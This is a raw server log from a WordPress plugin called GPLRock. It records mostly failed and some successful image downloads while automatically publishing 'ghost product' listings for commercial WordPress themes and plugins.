Ghost product published with image - Product ID: rigel-ultimate-agency-portfolio-theme [05-Apr-2026 08:19:39 UTC] GPLRock: Image downloaded successfully for product petiva-pet-care-and-pet-shop-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd514fdc.webp [05-Apr-2026 08:19:39 UTC] GPLRock: Using pre-downloaded image for product petiva-pet-care-and-pet-shop-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cd514fdc.webp [05-Apr-2026 08:19:39 UTC] GPLRock: Ghost product published with image - Product ID: petiva-pet-care-and-pet-shop-wordpress-theme [05-Apr-2026 08:19:39 UTC] GPLRock: Image download failed for product medglow-healthcare-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:41 UTC] GPLRock: Image download failed for product medglow-healthcare-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medglow---healthcare--medical-wordpress-theme-2690.webp for product medglow-healthcare-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:43 UTC] GPLRock: Image download failed for product medglow-healthcare-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:45 UTC] GPLRock: Image download failed for product medglow-healthcare-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medglow---healthcare--medical-wordpress-theme-2690.webp for product medglow-healthcare-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:47 UTC] GPLRock WARNING: Image download failed for product medglow-healthcare-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/medglow---healthcare--medical-wordpress-theme-2690.webp [05-Apr-2026 08:19:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: medglow-healthcare-medical-wordpress-theme [05-Apr-2026 08:21:39 UTC] GPLRock: Image download failed for product empic-ajax-powered-multi-concept-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:21:41 UTC] GPLRock: Image download failed for product empic-ajax-powered-multi-concept-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:21:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/empic---ajax-powered-multi-concept-woocommerce-theme-21449.webp for product empic-ajax-powered-multi-concept-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:21:43 UTC] GPLRock: Image download failed for product empic-ajax-powered-multi-concept-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:21:45 UTC] GPLRock: Image download failed for product empic-ajax-powered-multi-concept-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:21:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/empic---ajax-powered-multi-concept-woocommerce-theme-21449.webp for product empic-ajax-powered-multi-concept-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:21:47 UTC] GPLRock WARNING: Image download failed for product empic-ajax-powered-multi-concept-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/empic---ajax-powered-multi-concept-woocommerce-theme-21449.webp [05-Apr-2026 08:21:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: empic-ajax-powered-multi-concept-woocommerce-theme [05-Apr-2026 08:21:47 UTC] GPLRock: Image download failed for product seowp-digital-marketing-agency-and-seo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:21:49 UTC] GPLRock: Image download failed for product seowp-digital-marketing-agency-and-seo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:21:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/seowp--digital-marketing-agency-and-seo-wordpress-theme-26092.webp for product seowp-digital-marketing-agency-and-seo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:21:51 UTC] GPLRock: Image download failed for product seowp-digital-marketing-agency-and-seo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:21:54 UTC] GPLRock: Image download failed for product seowp-digital-marketing-agency-and-seo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:31:45 UTC] GPLRock: Image download failed for product spicedine-wordpress-theme-for-hotels-restaurants (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:31:47 UTC] GPLRock: Image download failed for product spicedine-wordpress-theme-for-hotels-restaurants (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:31:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spicedine---wordpress-theme-for-hotels--restaurants-9282.webp for product spicedine-wordpress-theme-for-hotels-restaurants after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:31:49 UTC] GPLRock: Image download failed for product spicedine-wordpress-theme-for-hotels-restaurants (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:31:51 UTC] GPLRock: Image download failed for product spicedine-wordpress-theme-for-hotels-restaurants (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:31:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spicedine---wordpress-theme-for-hotels--restaurants-9282.webp for product spicedine-wordpress-theme-for-hotels-restaurants after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:31:53 UTC] GPLRock WARNING: Image download failed for product spicedine-wordpress-theme-for-hotels-restaurants. URL: https://meldwp.com/wp-content/uploads/spicedine---wordpress-theme-for-hotels--restaurants-9282.webp [05-Apr-2026 08:31:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: spicedine-wordpress-theme-for-hotels-restaurants [05-Apr-2026 08:31:53 UTC] GPLRock: Image download failed for product lumia-multipurpose-shopify-theme-os-20-multilanguage-rtl-support (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:31:55 UTC] GPLRock: Image download failed for product lumia-multipurpose-shopify-theme-os-20-multilanguage-rtl-support (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:31:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lumia---multipurpose-shopify-theme-os-20---multilanguage---rtl-support-11965.webp for product lumia-multipurpose-shopify-theme-os-20-multilanguage-rtl-support after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:31:58 UTC] GPLRock: Image download failed for product lumia-multipurpose-shopify-theme-os-20-multilanguage-rtl-support (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:00 UTC] GPLRock: Image download failed for product lumia-multipurpose-shopify-theme-os-20-multilanguage-rtl-support (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lumia---multipurpose-shopify-theme-os-20---multilanguage---rtl-support-11965.webp for product lumia-multipurpose-shopify-theme-os-20-multilanguage-rtl-support after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:02 UTC] GPLRock WARNING: Image download failed for product lumia-multipurpose-shopify-theme-os-20-multilanguage-rtl-support. URL: https://meldwp.com/wp-content/uploads/lumia---multipurpose-shopify-theme-os-20---multilanguage---rtl-support-11965.webp [05-Apr-2026 08:32:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lumia-multipurpose-shopify-theme-os-20-multilanguage-rtl-support [05-Apr-2026 08:32:02 UTC] GPLRock: Image download failed for product appkit-mobile (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:04 UTC] GPLRock: Image download failed for product appkit-mobile (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appkit-mobile-23083.webp for product appkit-mobile after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:06 UTC] GPLRock: Image download failed for product appkit-mobile (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:08 UTC] GPLRock: Image download failed for product appkit-mobile (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appkit-mobile-23083.webp for product appkit-mobile after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:10 UTC] GPLRock WARNING: Image download failed for product appkit-mobile. URL: https://meldwp.com/wp-content/uploads/appkit-mobile-23083.webp [05-Apr-2026 08:32:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: appkit-mobile [05-Apr-2026 08:32:11 UTC] GPLRock: Image downloaded successfully for product codbe-software-landing-page-and-it-solutions-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fc9dc40d.webp [05-Apr-2026 08:32:11 UTC] GPLRock: Using pre-downloaded image for product codbe-software-landing-page-and-it-solutions-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fc9dc40d.webp [05-Apr-2026 08:32:11 UTC] GPLRock: Ghost product published with image - Product ID: codbe-software-landing-page-and-it-solutions-wordpress-theme [05-Apr-2026 08:32:11 UTC] GPLRock: Image download failed for product bigex-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:13 UTC] GPLRock: Image download failed for product bigex-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bigex---portfolio-wordpress-theme-19101.webp for product bigex-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:15 UTC] GPLRock: Image download failed for product bigex-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:17 UTC] GPLRock: Image download failed for product bigex-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bigex---portfolio-wordpress-theme-19101.webp for product bigex-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:19 UTC] GPLRock WARNING: Image download failed for product bigex-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bigex---portfolio-wordpress-theme-19101.webp [05-Apr-2026 08:32:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bigex-portfolio-wordpress-theme [05-Apr-2026 08:32:19 UTC] GPLRock: Image download failed for product medify-health-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:22 UTC] GPLRock: Image download failed for product medify-health-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medify---health--clinic-wordpress-theme-31177.webp for product medify-health-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:24 UTC] GPLRock: Image download failed for product medify-health-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:26 UTC] GPLRock: Image download failed for product medify-health-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medify---health--clinic-wordpress-theme-31177.webp for product medify-health-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:28 UTC] GPLRock WARNING: Image download failed for product medify-health-clinic-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/medify---health--clinic-wordpress-theme-31177.webp [05-Apr-2026 08:32:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: medify-health-clinic-wordpress-theme [05-Apr-2026 08:32:28 UTC] GPLRock: Image download failed for product luxe-architecture-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:30 UTC] GPLRock: Image download failed for product luxe-architecture-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxe---architecture-theme-17840.webp for product luxe-architecture-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:33 UTC] GPLRock: Image download failed for product luxe-architecture-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:35 UTC] GPLRock: Image download failed for product luxe-architecture-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/luxe---architecture-theme-17840.webp for product luxe-architecture-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:37 UTC] GPLRock WARNING: Image download failed for product luxe-architecture-theme. URL: https://meldwp.com/wp-content/uploads/luxe---architecture-theme-17840.webp [05-Apr-2026 08:32:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: luxe-architecture-theme [05-Apr-2026 08:32:37 UTC] GPLRock: Image download failed for product genox-creative-gutenberg-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:39 UTC] GPLRock: Image download failed for product genox-creative-gutenberg-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/genox---creative-gutenberg-wordpress-theme-4488.webp for product genox-creative-gutenberg-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:41 UTC] GPLRock: Image download failed for product genox-creative-gutenberg-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:43 UTC] GPLRock: Image download failed for product genox-creative-gutenberg-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/genox---creative-gutenberg-wordpress-theme-4488.webp for product genox-creative-gutenberg-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:45 UTC] GPLRock WARNING: Image download failed for product genox-creative-gutenberg-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/genox---creative-gutenberg-wordpress-theme-4488.webp [05-Apr-2026 08:32:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: genox-creative-gutenberg-wordpress-theme [05-Apr-2026 08:32:46 UTC] GPLRock: Image download failed for product cavalier-gaming-studio-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:48 UTC] GPLRock: Image download failed for product cavalier-gaming-studio-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cavalier---gaming-studio-wordpress-theme--rtl-25143.webp for product cavalier-gaming-studio-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:50 UTC] GPLRock: Image download failed for product cavalier-gaming-studio-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:52 UTC] GPLRock: Image download failed for product cavalier-gaming-studio-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cavalier---gaming-studio-wordpress-theme--rtl-25143.webp for product cavalier-gaming-studio-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:54 UTC] GPLRock WARNING: Image download failed for product cavalier-gaming-studio-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/cavalier---gaming-studio-wordpress-theme--rtl-25143.webp [05-Apr-2026 08:32:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cavalier-gaming-studio-wordpress-theme-rtl [05-Apr-2026 08:32:54 UTC] GPLRock: Image download failed for product dantoa-dental-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:56 UTC] GPLRock: Image download failed for product dantoa-dental-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:32:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dantoa---dental--medical-wordpress-theme-4612.webp for product dantoa-dental-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:32:59 UTC] GPLRock: Image download failed for product dantoa-dental-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:33:01 UTC] GPLRock: Image download failed for product dantoa-dental-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:33:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dantoa---dental--medical-wordpress-theme-4612.webp for product dantoa-dental-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:33:03 UTC] GPLRock WARNING: Image download failed for product dantoa-dental-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dantoa---dental--medical-wordpress-theme-4612.webp [05-Apr-2026 08:33:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dantoa-dental-medical-wordpress-theme [05-Apr-2026 08:33:28 UTC] GPLRock: Image downloaded successfully for product mythemeshop-emerald-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cb5e466.jpg [05-Apr-2026 08:33:29 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-emerald-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6cb5e466.jpg [05-Apr-2026 08:33:29 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-emerald-wordpress-theme [05-Apr-2026 08:33:30 UTC] GPLRock: Image downloaded successfully for product searchwp-meta-box-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9969d9f0.jpg [05-Apr-2026 08:33:30 UTC] GPLRock: Using pre-downloaded image for product searchwp-meta-box-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9969d9f0.jpg [05-Apr-2026 08:33:30 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-meta-box-integration [05-Apr-2026 08:33:31 UTC] GPLRock: Image downloaded successfully for product geodirectory-custom-post-types (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29012e72.jpg [05-Apr-2026 08:33:32 UTC] GPLRock: Using pre-downloaded image for product geodirectory-custom-post-types: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-29012e72.jpg [05-Apr-2026 08:33:32 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-custom-post-types [05-Apr-2026 08:33:33 UTC] GPLRock: Image downloaded successfully for product ninja-forms-icontact (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-687156df.jpg [05-Apr-2026 08:33:33 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-icontact: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-687156df.jpg [05-Apr-2026 08:33:33 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-icontact [05-Apr-2026 08:33:34 UTC] GPLRock: Image downloaded successfully for product elmastudio-pohutukawa-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c0b4fa82.jpg [05-Apr-2026 08:33:34 UTC] GPLRock: Using pre-downloaded image for product elmastudio-pohutukawa-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c0b4fa82.jpg [05-Apr-2026 08:33:34 UTC] GPLRock: Ghost product published with image - Product ID: elmastudio-pohutukawa-wordpress-theme [05-Apr-2026 08:33:36 UTC] GPLRock: Image downloaded successfully for product searchwp-boolean-search-query (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b0072b01.jpg [05-Apr-2026 08:33:36 UTC] GPLRock: Using pre-downloaded image for product searchwp-boolean-search-query: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b0072b01.jpg [05-Apr-2026 08:33:36 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-boolean-search-query [05-Apr-2026 08:33:38 UTC] GPLRock: Image downloaded successfully for product whmpress-whmcs-client-area-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-17693699.jpg [05-Apr-2026 08:33:38 UTC] GPLRock: Using pre-downloaded image for product whmpress-whmcs-client-area-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-17693699.jpg [05-Apr-2026 08:33:38 UTC] GPLRock: Ghost product published with image - Product ID: whmpress-whmcs-client-area-for-wordpress [05-Apr-2026 08:33:39 UTC] GPLRock: Image downloaded successfully for product ultimate-member-user-tags (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e371ec9.jpg [05-Apr-2026 08:33:39 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-user-tags: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8e371ec9.jpg [05-Apr-2026 08:33:39 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-user-tags [05-Apr-2026 08:33:41 UTC] GPLRock: Image downloaded successfully for product wpdiscuz-syntax-highlighter (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bdd8a80b.jpg [05-Apr-2026 08:33:41 UTC] GPLRock: Using pre-downloaded image for product wpdiscuz-syntax-highlighter: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bdd8a80b.jpg [05-Apr-2026 08:33:41 UTC] GPLRock: Ghost product published with image - Product ID: wpdiscuz-syntax-highlighter [05-Apr-2026 08:33:43 UTC] GPLRock: Image downloaded successfully for product wallace-inline-front-end-content-editor-for-beaver-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb61db71.jpg [05-Apr-2026 08:33:43 UTC] GPLRock: Using pre-downloaded image for product wallace-inline-front-end-content-editor-for-beaver-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fb61db71.jpg [05-Apr-2026 08:33:43 UTC] GPLRock: Ghost product published with image - Product ID: wallace-inline-front-end-content-editor-for-beaver-builder [05-Apr-2026 08:34:41 UTC] GPLRock: Image download failed for product twitch-livestream-box-and-countdown-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:34:43 UTC] GPLRock: Image download failed for product twitch-livestream-box-and-countdown-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:34:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/twitch-livestream-box-and-countdown-wordpress-plugin-20361.webp for product twitch-livestream-box-and-countdown-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:34:45 UTC] GPLRock: Image download failed for product twitch-livestream-box-and-countdown-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:34:47 UTC] GPLRock: Image download failed for product twitch-livestream-box-and-countdown-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:34:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/twitch-livestream-box-and-countdown-wordpress-plugin-20361.webp for product twitch-livestream-box-and-countdown-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:34:50 UTC] GPLRock WARNING: Image download failed for product twitch-livestream-box-and-countdown-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/twitch-livestream-box-and-countdown-wordpress-plugin-20361.webp [05-Apr-2026 08:34:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: twitch-livestream-box-and-countdown-wordpress-plugin [05-Apr-2026 08:34:50 UTC] GPLRock: Image download failed for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:34:52 UTC] GPLRock: Image download failed for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:34:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementor-addon-for-idonatepro---blood-donation-request-and-donor-management-7936.webp for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:34:54 UTC] GPLRock: Image download failed for product elementor-addon-for-idonatepro-blood-donation-request-and-donor-management (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:44:54 UTC] GPLRock: Image download failed for product blund-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:44:56 UTC] GPLRock: Image download failed for product blund-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:44:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blund-minimal-portfolio-wordpress-theme-3824.webp for product blund-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:44:58 UTC] GPLRock: Image download failed for product blund-minimal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:01 UTC] GPLRock: Image download failed for product blund-minimal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blund-minimal-portfolio-wordpress-theme-3824.webp for product blund-minimal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:03 UTC] GPLRock WARNING: Image download failed for product blund-minimal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/blund-minimal-portfolio-wordpress-theme-3824.webp [05-Apr-2026 08:45:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blund-minimal-portfolio-wordpress-theme [05-Apr-2026 08:45:03 UTC] GPLRock: Image download failed for product kingal-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:05 UTC] GPLRock: Image download failed for product kingal-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kingal---multipurpose-wordpress-theme-20353.webp for product kingal-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:07 UTC] GPLRock: Image download failed for product kingal-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:09 UTC] GPLRock: Image download failed for product kingal-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kingal---multipurpose-wordpress-theme-20353.webp for product kingal-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:12 UTC] GPLRock WARNING: Image download failed for product kingal-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kingal---multipurpose-wordpress-theme-20353.webp [05-Apr-2026 08:45:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kingal-multipurpose-wordpress-theme [05-Apr-2026 08:45:12 UTC] GPLRock: Image download failed for product blanquette-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:14 UTC] GPLRock: Image download failed for product blanquette-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blanquette---restaurant-wordpress-theme-2034.webp for product blanquette-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:45:16 UTC] GPLRock: Image download failed for product blanquette-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:45:18 UTC] GPLRock: Image download failed for product blanquette-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . 